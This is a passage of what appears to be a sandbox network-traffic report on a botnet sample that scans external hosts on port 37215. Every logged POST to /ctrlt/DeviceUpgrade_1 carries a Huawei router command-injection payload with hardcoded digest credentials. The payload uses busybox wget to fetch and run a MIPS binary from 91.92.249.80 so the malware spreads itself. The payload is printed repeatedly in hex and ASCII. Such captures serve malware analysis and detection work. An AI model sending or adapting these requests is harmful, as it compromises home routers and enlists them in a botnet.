                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          174192.168.2.2335088157.240.58.21537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138103962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          175192.168.2.234915873.248.0.15237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138103962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          176192.168.2.2354002157.204.41.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138107061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          177192.168.2.2356760197.202.22.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138142109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          178192.168.2.234321841.147.165.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138145924 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          179192.168.2.2347300197.234.255.8937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.138170958 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          180192.168.2.2356800197.183.131.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140067101 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          181192.168.2.2335974157.7.242.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140101910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          182192.168.2.2348626197.243.45.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140130997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          183192.168.2.235869479.109.207.19137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.140176058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
